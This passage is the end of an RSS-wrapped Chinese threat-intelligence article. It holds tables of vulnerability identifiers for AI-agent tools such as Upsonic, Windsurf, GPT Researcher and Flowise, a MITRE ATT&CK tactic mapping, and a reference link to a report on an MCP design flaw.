0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">标识符</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">描述</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE-2026-30625</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">Upsonic命令注入漏洞</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE-2026-30615</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">Windsurf零点击提示词注入漏洞</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">CVE-2025-65720</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">GPT Researcher命令注入漏洞</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">GHSA</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">GHSA-c9gw-hvqq-f33r</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">Flowise加固绕过漏洞</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">TTP</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1059</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">命令与脚本解释器执行</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">TTP</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1190</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">利用面向公众的应用</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">TTP</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1027</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">混淆文件或信息</span></p></td></tr></tbody></table><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK技术映射</span></h2><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;line-height: 1.75;text-align: left;color: rgb(10, 10, 10);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;max-width: 100%;overflow: auto;" data-pm-slice="0 0 []"><table style="box-sizing: border-box;border-width: 0px;border-style: solid;border-color: inherit;border-image: initial;margin-top: 0px !important;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);text-indent: 0px;border-collapse: collapse;border-spacing: 0px;color: rgb(10, 10, 10);"><thead><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">战术</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">技术ID</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">名称</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">初始访问</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1190</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">利用面向公众的应用</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">执行</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1059</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">命令与脚本解释器</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">执行</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1053</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">计划任务/作业</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">持久化</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1543</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">创建/修改系统进程</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">权限提升</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1068</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">利用特权升级漏洞</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">防御规避</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1027</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">混淆文件或信息</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">凭证访问</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1552</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">未保护凭证</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">横向移动</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1021</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">远程服务</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">数据外泄</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1041</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">通过C2通道外泄</span></p></td></tr></tbody></table></p><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="list-style: circle;padding-left: 1em;margin-left: 0px;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: rgb(0, 0, 0);"><p><span leaf=""><a href="https://go.theregister.com/feed/www.theregister.com/2026/04/16/anthropic_mcp_design_flaw/" target="_blank">https://go.theregister.com/feed/www.theregister.com/2026/04/16/anthropic_mcp_design_flaw/</a></span></p></li><li style="display: block;margin: 0.2em 8px;color: rgb(0, 0, 0);"><p><span leaf="">Anthropic MCP官方文档与安全策略</span></p></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f54a22a0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518473%26idx%3D1%26sn%3D39cc2ea54cae3aee275196ef01298f3f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 19 Apr 2026 09:30:00 +0800</pubDate>
    </item>
  </channel>
</rss>